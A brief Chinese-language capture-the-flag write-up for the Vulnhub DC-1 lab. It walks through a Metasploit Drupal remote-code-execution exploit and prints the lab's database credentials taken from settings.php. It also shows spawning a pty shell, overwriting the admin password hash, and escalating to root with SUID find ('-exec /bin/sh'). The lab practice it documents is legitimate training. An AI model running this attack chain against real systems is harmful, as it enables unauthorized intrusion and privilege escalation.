Vulnhub DC-1
Vulnhub DC-1
简介
DC-1是一个专门建造的易受攻击的实验室,目的是获得渗透测试领域的经验。
它是为初学者设计的一个A挑战,但它到底有多容易将取决于你的技能和知识,以及你的学习能力。
要成功地完成这一挑战,您将需要Linux技能、熟悉Linux命令行和基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。
有多种获取根目录的方法,但是,我包含了一些包含初学者线索的标志。
总共有五个标志,但最终目标是在root的主目录中找到并读取该标志。您甚至不需要是root用户才能执行此操作,但是,您将需要root权限。
根据你的技能水平,你可以跳过找到这些标志的大部分,直接去找根。
内网探测
使用命令 netdiscover
找到ip 192.168.38.132
网站信息收集
探测到cms为 drupal
使用msf攻击
在网络搜索到drupal存在远程命令执行漏洞
进入msfconsole 使用命令 search drupal
使用模块 use 4
查看选项 show options
设置选项 set rhosts 192.168.38.132
开始攻击 exploit
得到flag1
配置信息
提示查看配置文件 百度搜索其路径
打开/sites/default/settings.php
得到flag2
后台登录
根据配置文件可以得到数据库账号密码 并且根据提示产尝试进入数据库
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
meterpreter > shell
python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-1:/var/www/sites/default$ //执行完之后可获得python提供的标准shell
查询到users表 得到管理员账户密码
根据提示 密码不需要用暴力破解 可以将密码覆盖
更新的密码为使用drupal自带加密加密123456的hash
进入后台
得到flag3
根据提示cat etc/passwd
得到用户
可证明有flag4用户的home文件
得到flag4 提示需要root权限
suid 提权
find / -perm -u=s -type f 2>/dev/null
查看拥有suid权限的命令
/usr/bin/find a -exec whoami \;
使用find命令查看当前权限
权限为root
/usr/bin/find a -exec '/bin/sh' \;
使用find函数来开启shell
得到最终的flag
总结
- 充分寻找网站指纹,然后利用好搜索引擎,会有意想不到的收获
- 查看配置信息
- 当数据库密码不可破解时,合理使用update和insert
find / -perm -u=s -type f 2>/dev/null
查看拥有suid权限的命令